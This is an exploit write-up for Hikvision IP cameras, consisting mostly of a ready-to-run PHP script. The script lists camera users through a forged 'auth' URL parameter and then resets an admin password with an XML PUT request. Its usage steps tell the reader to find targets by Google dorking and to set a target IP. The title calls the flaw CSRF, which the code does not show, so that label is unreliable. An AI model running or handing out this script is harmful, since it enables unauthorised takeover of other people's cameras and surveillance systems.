Hikvision IP Camera Cross Site Request Forgery

=============================================================================================================================================| # Title     : Hikvision IP Camera CSRF Add ADmin Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.hikvision.com/                                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The vulnerability has been present in Hikvision products since 2014.[+] add new admin.[+] Line 104 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass HikvisionExploit {    private $target;    private $port;    private $username;    private $password;    private $id;    private $storeCred;    public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {        $this->target = $target;        $this->port = $port;        $this->username = $username;        $this->password = $password;        $this->id = $id;        $this->storeCred = $storeCred;    }    public function check() {        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('GET', $url);        if (!$response) {            return 'No response received from the target!';        }        if ($response['http_code'] == 200) {            echo "Following users are available for password reset...\n";            $xml = simplexml_load_string($response['body']);            foreach ($xml->User as $user) {                echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";            }            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit() {        if ($this->check() !== 'Vulnerable') {            return false;        }        echo "Starting the password reset for {$this->username}...\n";        $postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" .            "<id>{$this->id}</id>\r\n" .            "<userName>{$this->username}</userName>\r\n" .            "<password>{$this->password}</password>\r\n</User>";        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('PUT', $url, $postData, 'application/xml');        if (!$response) {            echo "Target server did not respond to the password reset request\n";            return false;        }        if ($response['http_code'] == 200) {            echo "Password reset for {$this->username} was successfully completed!\n";            echo "Please log in with your new password: {$this->password}\n";            if ($this->storeCred) {                $this->reportCreds();            }        } else {            echo "Unknown Error. Password reset was not successful!\n";        }    }    private function sendRequest($method, $url, $data = null, $contentType = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if ($contentType) {            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['http_code' => $http_code, 'body' => $response];    }    private function generateRandomPassword($length = 10) {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);    }    private function reportCreds() {        // In a real implementation, you could store the credentials into a database        echo "Credentials for {$this->username} were added to the database...\n";    }}// Example usage$exploit = new HikvisionExploit('target-ip');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================